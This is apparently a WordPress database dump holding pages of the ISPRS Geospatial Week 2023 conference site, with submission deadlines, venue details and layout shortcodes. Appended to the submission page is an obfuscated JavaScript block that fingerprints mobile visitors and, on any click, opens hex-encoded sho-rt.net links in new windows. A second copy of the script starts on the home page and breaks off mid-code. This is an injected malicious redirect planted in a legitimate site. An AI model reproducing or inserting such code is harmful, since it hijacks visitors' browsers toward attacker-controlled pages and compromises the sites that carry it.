(3658,1,'2023-01-28 23:40:39','2023-01-28 23:40:39','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"25\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\">\n<h1><b>Important Dates:</b></h1>\n</div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h4><b>Paper submissions<u></u><u></u></b></h4>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><u></u><span style=\"font-size: 14pt;\">•  <u></u>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)<u></u><u></u></span></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpMiddle\"><span style=\"font-size: 14pt;\"><u></u>•  Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)<u></u><u></u></span></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpMiddle\"><span style=\"font-size: 14pt;\"><u></u>•  <u></u>Abstracts Author notification: May 15, 2023<u></u><u></u></span></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpMiddle\"><span style=\"font-size: 14pt;\"><u></u>•  <u></u>Full paper Author notification: May 1, 2023<u></u><u></u></span></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\"><u></u>•  Camera ready paper submission: June 1, 2023</span><u></u><u></u></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines<u></u><u></u></b></h4>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><u></u><span style=\"font-size: 14pt;\">• Early bird registration deadline: May 1, 2023<u></u><u></u></span></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\"><u></u>• Late registration deadline: July 1, 2023</span></p>\n</li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-01-28 23:40:39','2023-01-28 23:40:39','',2659,'https://gsw2023.com/?p=3658',0,'revision','',0),
(3659,1,'2023-01-29 01:58:58','2023-01-29 01:58:58','','Egyptian Pyramids In Sand Desert And Clear Sky','Egyptian pyramids in sand desert and clear sky','inherit','open','closed','','egyptian-pyramids-in-sand-desert-and-clear-sky-6','','','2023-01-29 01:58:58','2023-01-29 01:58:58','',3066,'https://gsw2023.com/wp-content/uploads/2023/01/egyptian-pyramids_m.jpg',0,'attachment','image/jpeg',0),
(3660,1,'2023-01-29 01:59:17','2023-01-29 01:59:17','[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1673292178000{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 